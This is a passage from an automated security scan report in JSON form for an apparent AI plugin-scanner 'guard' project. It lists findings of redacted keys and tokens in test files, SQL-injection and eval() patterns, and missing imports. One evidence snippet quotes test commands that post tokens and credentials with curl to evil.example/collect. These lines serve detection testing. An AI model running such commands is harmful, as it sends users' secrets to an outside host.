{"startLine": 18149}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145061, "scanner": "gitleaks", "fingerprint": "149523da61adfa6dd413950d6cac9987bb93df0fef492b534d387697564a6ba7", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|99|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 996}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145060, "scanner": "gitleaks", "fingerprint": "c647e629c4abea946752f83b2fd932e09b77b7245f2adc3debb891998ed5c35b", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|94|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 944}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145059, "scanner": "gitleaks", "fingerprint": "94f2642d02de73dd1dcf7fbfdacc656362a601174ae524a8d6feeddd868facea", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|88|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 885}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145058, "scanner": "gitleaks", "fingerprint": "dcfbaa365add4f0762d2f70658cc910ef9ea96dd64b968f6f7dbb89d647a3557", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|79|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 796}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145057, "scanner": "gitleaks", "fingerprint": "02dc6cf8b5cea72e46eaf179eb09834ca91c764751be5b3a5198463eb0108e48", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|72|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 730}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145056, "scanner": "gitleaks", "fingerprint": "b8c71626de7f93e024a6e513d9979f598c4a7c2c38aa6b2c59ab67c16b94bb59", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|66|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 670}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145055, "scanner": "gitleaks", "fingerprint": "e2c95624f937647598e82b0be4a85f239db02464e76316297bf069b74e40b662", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|47|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_store_migrations.py"}, "region": {"startLine": 471}}}]}, {"ruleId": "curl-auth-user", "level": "error", "message": {"text": "Discovered a potential basic authorization token provided in a curl command, which could compromise the curl accessed resource."}, "properties": {"repobilityId": 145054, "scanner": "gitleaks", "fingerprint": "04f30d8efc2fb2dab8d9040b43f9fcd93419e980e32d9d54052226bb4588860d", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "curl -d \"token=<redacted>\" https://evil.example/collect',\n        \"curl -u REDACTED https://evil.example/collect\",\n        \"curl --user REDACTED", "rule_id": "curl-auth-user", "scanner": "gitleaks", "detector": "curl-auth-user", "correlation_key": "secret|tests/test_guard_risk.py|381|curl -d token redacted token curl -u redacted token curl --user redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_risk.py"}, "region": {"startLine": 3818}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145053, "scanner": "gitleaks", "fingerprint": "dfbf33e33a1e1fc6bf63391dbf7f7aee485cc9e178e6f67bde722a8f575a1d2e", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|119|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_surface_server.py"}, "region": {"startLine": 1198}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145052, "scanner": "gitleaks", "fingerprint": "537477e81ee68e45e36a063a15535d620dcf7166d672947c72758895ca633904", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|108|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_surface_server.py"}, "region": {"startLine": 1089}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145051, "scanner": "gitleaks", "fingerprint": "62689e4c3249b9936d42a4fc9bfde667b351f17cef23019b11cbe698a7cf3c47", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|100|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_surface_server.py"}, "region": {"startLine": 1006}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145050, "scanner": "gitleaks", "fingerprint": "8d3b7935294f9ea6973191e088e41eff177fa9297a25f2675b46ddaf3b83ce59", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "key=REDACTED\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|20|key redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_redaction.py"}, "region": {"startLine": 205}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145049, "scanner": "gitleaks", "fingerprint": "6c30a7989b0dca3b922d57c13cd7f501582282355d1c660e01c4335812943d51", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "OPENAI_API_KEY=<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|3|openai_api_key redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_redaction.py"}, "region": {"startLine": 33}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145048, "scanner": "gitleaks", "fingerprint": "f9c36cd132374dcedf110d3d7e36661fed3e5ccfbe0a103a03a28f7e32e648a3", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "dashboard_session_token=\"<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|170|dashboard_session_token redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_headless_daemon_api.py"}, "region": {"startLine": 1706}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145047, "scanner": "gitleaks", "fingerprint": "259dd2013b3fe00a96f86e5d3301a985cac0a64bff029c1ddd12ce2d56190678", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "token=\"<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|168|token redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_headless_daemon_api.py"}, "region": {"startLine": 1684}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145046, "scanner": "gitleaks", "fingerprint": "3e29f12f8e4c6df6dcaa3cc44e77a057829a87b6718bb1c32a7583a33de06a8c", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "accessToken\": \"<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|44|accesstoken : redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_actions.py"}, "region": {"startLine": 449}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145045, "scanner": "gitleaks", "fingerprint": "ae44b4c78eb7d9c96a1b1b35e8b9e615b989e3876f5e467a058a01eee0828a95", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "NPM_TOKEN=<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|43|npm_token redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_actions.py"}, "region": {"startLine": 431}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145044, "scanner": "gitleaks", "fingerprint": "4a0eb899d58925d2c03638a968e7aa2eb877a5eb2b3a4b5a115aa00576e37b3b", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "NPM_TOKEN=<redacted>", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|23|npm_token redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_actions.py"}, "region": {"startLine": 240}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145043, "scanner": "gitleaks", "fingerprint": "aab38d19ac4bbbb38d82fdd981b8585ba4d8877bf9b7e772ed1c2212d237f754", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|5|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_source_view_secret_fixtures.py"}, "region": {"startLine": 51}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145042, "scanner": "gitleaks", "fingerprint": "2821afb30755bd86d881250ce5a70236c5b57c36097a45521f33788710810627", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|1|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_source_view_secret_fixtures.py"}, "region": {"startLine": 19}}}]}, {"ruleId": "private-key", "level": "error", "message": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "properties": {"repobilityId": 145041, "scanner": "gitleaks", "fingerprint": "7e6612dc43ef88095cf023f927065794533185fe5c79e0a09b596efca25a116a", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "private-key", "scanner": "gitleaks", "detector": "private-key", "correlation_key": "secret|token|35|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_product_flow.py"}, "region": {"startLine": 356}}}]}, {"ruleId": "github-pat", "level": "error", "message": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "properties": {"repobilityId": 145040, "scanner": "gitleaks", "fingerprint": "f16248a4f5ed49409b9069c68b5a1ef5a7e12dd5ee8ca023cd80197b5add03cd", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "github-pat", "scanner": "gitleaks", "detector": "github-pat", "correlation_key": "secret|token|29|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_data_flow.py"}, "region": {"startLine": 294}}}]}, {"ruleId": "github-pat", "level": "error", "message": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "properties": {"repobilityId": 145039, "scanner": "gitleaks", "fingerprint": "7396cba5dd9e09b49d8e82f432b20c5bba05064512c6e2cc0e4c03484355921f", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "REDACTED", "rule_id": "github-pat", "scanner": "gitleaks", "detector": "github-pat", "correlation_key": "secret|token|23|redacted", "duplicate_count": 1, "duplicate_rule_ids": ["github-pat"], "duplicate_scanners": ["gitleaks"], "duplicate_fingerprints": ["7396cba5dd9e09b49d8e82f432b20c5bba05064512c6e2cc0e4c03484355921f", "74d9d31907e4a0f67f849d715db8effafc8f2d9bfcd93e6398f05ccc8bf10f49"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_data_flow.py"}, "region": {"startLine": 231}}}]}, {"ruleId": "github-pat", "level": "error", "message": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "properties": {"repobilityId": 145038, "scanner": "gitleaks", "fingerprint": "5a00daf3ca9b042d6191a380e8e71d5cf7fadd6455dcab0a74643dbf9cef4070", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "REDACTED", "rule_id": "github-pat", "scanner": "gitleaks", "detector": "github-pat", "correlation_key": "secret|token|22|redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_data_flow.py"}, "region": {"startLine": 227}}}]}, {"ruleId": "generic-api-key", "level": "error", "message": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "properties": {"repobilityId": 145037, "scanner": "gitleaks", "fingerprint": "82165df2e50e23bfd2f9cc4e562cb1c189f00a5a7325d4b90620c0aaae1daf9f", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "API_KEY = \"<redacted>\"", "rule_id": "generic-api-key", "scanner": "gitleaks", "detector": "generic-api-key", "correlation_key": "secret|token|1|api_key redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/bad-plugin/secrets.js"}, "region": {"startLine": 1}}}]}, {"ruleId": "curl-auth-header", "level": "error", "message": {"text": "Discovered a potential authorization token provided in a curl command header, which could compromise the curl accessed resource."}, "properties": {"repobilityId": 145036, "scanner": "gitleaks", "fingerprint": "af73bf6033599c4e415fca82c1cd93b158721e2bf9320149f46d8eba8f22aa14", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "curl -H \"Authorization: Bearer <redacted>\"", "rule_id": "curl-auth-header", "scanner": "gitleaks", "detector": "curl-auth-header", "correlation_key": "secret|token|1|curl -h authorization: bearer redacted"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/guard-red-team/benign-docs-fake-token.py"}, "region": {"startLine": 20}}}]}, {"ruleId": "MINED007", "level": "error", "message": {"text": "[MINED007] Sql String Concat: cursor.execute(f\"... {user_input} ...\") \u2014 SQL injection."}, "properties": {"repobilityId": 145023, "scanner": "repobility-threat-engine", "fingerprint": "1814a1fe41890f274843b118382664f7309e9ba5f2d6ce0d727045e848418251", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "sql-string-concat", "owasp": "A03:2021", "cwe_ids": ["CWE-89"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347914+00:00", "triaged_in_corpus": 20, "observations_count": 210457, "ai_coder_pattern_id": 12}, "scanner": "repobility-threat-engine", "correlation_key": "fp|1814a1fe41890f274843b118382664f7309e9ba5f2d6ce0d727045e848418251"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store_resume.py"}, "region": {"startLine": 159}}}]}, {"ruleId": "MINED007", "level": "error", "message": {"text": "[MINED007] Sql String Concat: cursor.execute(f\"... {user_input} ...\") \u2014 SQL injection."}, "properties": {"repobilityId": 145022, "scanner": "repobility-threat-engine", "fingerprint": "ea382d1ad6747f26d6456c67beda2cb8a82d8d38572529464c519358161b3f0a", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "sql-string-concat", "owasp": "A03:2021", "cwe_ids": ["CWE-89"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347914+00:00", "triaged_in_corpus": 20, "observations_count": 210457, "ai_coder_pattern_id": 12}, "scanner": "repobility-threat-engine", "correlation_key": "fp|ea382d1ad6747f26d6456c67beda2cb8a82d8d38572529464c519358161b3f0a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store_evidence.py"}, "region": {"startLine": 173}}}]}, {"ruleId": "MINED024", "level": "error", "message": {"text": "[MINED024] Js Eval Usage: eval() executes arbitrary code. Code injection risk."}, "properties": {"repobilityId": 144985, "scanner": "repobility-threat-engine", "fingerprint": "7db08097913be7e867234a05c54aabea62a1e3d131f2da7cfed20ec0338b0fd6", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "js-eval-usage", "owasp": null, "cwe_ids": ["CWE-95"], "languages": ["javascript", "typescript", "tsx", "jsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347954+00:00", "triaged_in_corpus": 20, "observations_count": 35589, "ai_coder_pattern_id": 103}, "scanner": "repobility-threat-engine", "correlation_key": "fp|7db08097913be7e867234a05c54aabea62a1e3d131f2da7cfed20ec0338b0fd6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/app-catalog.js"}, "region": {"startLine": 31}}}]}, {"ruleId": "MINED024", "level": "error", "message": {"text": "[MINED024] Js Eval Usage: eval() executes arbitrary code. Code injection risk."}, "properties": {"repobilityId": 144984, "scanner": "repobility-threat-engine", "fingerprint": "a927cc95e013f48134b1452ccafa48b9648ef9de423c9809414e32d38419c204", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "js-eval-usage", "owasp": null, "cwe_ids": ["CWE-95"], "languages": ["javascript", "typescript", "tsx", "jsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347954+00:00", "triaged_in_corpus": 20, "observations_count": 35589, "ai_coder_pattern_id": 103}, "scanner": "repobility-threat-engine", "correlation_key": "fp|a927cc95e013f48134b1452ccafa48b9648ef9de423c9809414e32d38419c204"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/apps/app-catalog.ts"}, "region": {"startLine": 78}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144972, "scanner": "repobility-ast-engine", "fingerprint": "d025ab005dd5f06801932d55ec8a72a15f8d2b4eee354ecb2e0a78695ae1467d", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|d025ab005dd5f06801932d55ec8a72a15f8d2b4eee354ecb2e0a78695ae1467d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/cli/commands.py"}, "region": {"startLine": 5317}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `warnings` used but not imported"}, "properties": {"repobilityId": 144971, "scanner": "repobility-ast-engine", "fingerprint": "551e855466352b1b817acab0fb89c2191400757852f6f73ac7a322e7a04d20e5", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|551e855466352b1b817acab0fb89c2191400757852f6f73ac7a322e7a04d20e5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/cli/install_commands.py"}, "region": {"startLine": 236}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144970, "scanner": "repobility-ast-engine", "fingerprint": "ae6ff6f22e989085e049beda30f0d7b421a60cd7804288d5b26d2b8fb003cb6c", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ae6ff6f22e989085e049beda30f0d7b421a60cd7804288d5b26d2b8fb003cb6c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/consumer/service.py"}, "region": {"startLine": 252}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144969, "scanner": "repobility-ast-engine", "fingerprint": "82edd02b60100497209b5ced2735394bb587e8e99e3a2bcdeb5656121053c506", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|82edd02b60100497209b5ced2735394bb587e8e99e3a2bcdeb5656121053c506"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/decisions.py"}, "region": {"startLine": 154}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144968, "scanner": "repobility-ast-engine", "fingerprint": "22e2bdcb9191fc2c202703fc50d6aa79e2f09ff9a081b923150507e443a4db6a", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|22e2bdcb9191fc2c202703fc50d6aa79e2f09ff9a081b923150507e443a4db6a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/cisco_preflight.py"}, "region": {"startLine": 215}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144967, "scanner": "repobility-ast-engine", "fingerprint": "551eab17d25265938f952fd7a29d84b51db67e417cff978fce6ee882a1cf49d6", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|551eab17d25265938f952fd7a29d84b51db67e417cff978fce6ee882a1cf49d6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/data_flow_rules.py"}, "region": {"startLine": 606}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144966, "scanner": "repobility-ast-engine", "fingerprint": "b396f2b454a00105b0458fd6c646941c138721495298f483c459d418013b8120", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b396f2b454a00105b0458fd6c646941c138721495298f483c459d418013b8120"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/runner.py"}, "region": {"startLine": 497}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144965, "scanner": "repobility-ast-engine", "fingerprint": "87ae1fc69568fb9985fb32b928a29fa6b27c34d66072184c5d3dbaa4544cda20", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|87ae1fc69568fb9985fb32b928a29fa6b27c34d66072184c5d3dbaa4544cda20"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/signals.py"}, "region": {"startLine": 207}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144964, "scanner": "repobility-ast-engine", "fingerprint": "de6bb94b18f54726e6ac8d268f1976752752babc1b62e0b32587df2ee647b1bc", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|de6bb94b18f54726e6ac8d268f1976752752babc1b62e0b32587df2ee647b1bc"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/composition_rules.py"}, "region": {"startLine": 76}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144963, "scanner": "repobility-ast-engine", "fingerprint": "1894d47ecc3704370142514f792a2f5a837922b512dd030ab15ddafaac22e1f4", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": 